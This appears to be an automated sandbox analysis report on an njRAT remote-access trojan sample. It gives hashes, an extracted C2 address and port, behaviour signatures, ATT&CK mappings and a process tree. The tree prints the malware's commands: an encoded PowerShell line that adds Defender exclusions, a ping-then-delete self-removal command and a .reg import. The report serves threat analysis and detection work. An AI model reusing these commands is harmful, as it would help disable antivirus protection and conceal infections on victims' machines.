Analysis

  • max time kernel
    91s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-01-2024 15:14

General

  • Target

    6ADD6FA3EA74FFCBA90B3630ACDE5182.exe

  • Size

    76KB

  • MD5

    6add6fa3ea74ffcba90b3630acde5182

  • SHA1

    cd202aa598e13a57e6d2bb8c614eb3122d6fb280

  • SHA256

    1092849f2f8f3fb0d1f89f0bff367d0a0f1f138fe5eb45b56f0a970b1677e4be

  • SHA512

    b57f846773f78fda8ba5c8b4b718d092d9037df788d0ea41954d6170bc1e35391ab10d8d12658b8be26e31a16deb78e665c74d5fdc44d11c8bf8216af3ff794b

  • SSDEEP

    1536:I8R7MJTttj9U5XvdKygf7oFOepKmqwBCmDqorCMCX9QKkW:lCftjK5FKZf+OfwcmZ2RX9QLW

Malware Config

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

Svchost

C2

95.173.255.238:4444

Mutex

Windows Defender

Attributes
  • reg_key

    Windows Defender

  • splitter

    |Hassan|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6ADD6FA3EA74FFCBA90B3630ACDE5182.exe
    "C:\Users\Admin\AppData\Local\Temp\6ADD6FA3EA74FFCBA90B3630ACDE5182.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAdQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAZwBnACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488
    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Users\Admin\AppData\Local\Temp\Svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\Svchost.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Svchost.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3856
    • C:\Windows\regedit.exe
      "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ZulaHAX.reg"
      2⤵
      • Runs .reg file with regedit
      PID:3564
  • C:\Windows\SysWOW64\PING.EXE
    ping 0 -n 2
    1⤵
    • Runs ping.exe
    PID:2324

Network

MITRE ATT&CK Matrix ATT&CK v13

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Server.exe
    Filesize

    43KB

    MD5

    3d5e301c8221356991a5522034c5b907

    SHA1

    d71baabd5d474aa4aabc865e2ca73db578c71a6d

    SHA256

    c69616a4c334e550278446c2404e5ac5b896938179ade3a64afcfdf19b254e21

    SHA512

    9bb1feab4689858fd3034b64d9549ecc60a54a7c8f7e70eff22730855e375921c27901dcdc50e812266b1a80a269dfab2a4df82e8feba65e51e99d162501fc13

  • C:\Users\Admin\AppData\Local\Temp\ZulaHAX.reg
    Filesize

    281B

    MD5

    682e7f391ab8b4da7f66c32606e72d40

    SHA1

    246ba406ea9993dcef6c0924e4aa81acefc74209

    SHA256

    3cf29dc045b5c52fca23b16e252dd4d19d18faae0a2ccae3c3543259bbb456dc

    SHA512

    a1ddffc1f9441373b8c3214a221c840e420dadf4b9709578551886340d6a026bdaed142ea8dca164f536414292becad05795e9c8136d82ba1c3f9ff8bb0419d5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hbrduo4y.4wy.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1716-27-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB

  • memory/1716-45-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB

  • memory/1716-19-0x00000000016D0000-0x00000000016E0000-memory.dmp
    Filesize

    64KB

  • memory/1716-22-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB

  • memory/2488-16-0x00007FF8CA8B0000-0x00007FF8CB371000-memory.dmp
    Filesize

    10.8MB

  • memory/2488-34-0x00007FF8CA8B0000-0x00007FF8CB371000-memory.dmp
    Filesize

    10.8MB

  • memory/2488-17-0x0000027854C40000-0x0000027854C50000-memory.dmp
    Filesize

    64KB

  • memory/2488-18-0x0000027854C40000-0x0000027854C50000-memory.dmp
    Filesize

    64KB

  • memory/2488-21-0x0000027856A70000-0x0000027856A92000-memory.dmp
    Filesize

    136KB

  • memory/2616-15-0x00007FF8CA8B0000-0x00007FF8CB371000-memory.dmp
    Filesize

    10.8MB

  • memory/2616-0-0x0000000000BC0000-0x0000000000BD8000-memory.dmp
    Filesize

    96KB

  • memory/2616-2-0x000000001B760000-0x000000001B770000-memory.dmp
    Filesize

    64KB

  • memory/2616-1-0x00007FF8CA8B0000-0x00007FF8CB371000-memory.dmp
    Filesize

    10.8MB

  • memory/2848-44-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB

  • memory/2848-46-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB

  • memory/2848-49-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB

  • memory/2848-51-0x00000000745B0000-0x0000000074B61000-memory.dmp
    Filesize

    5.7MB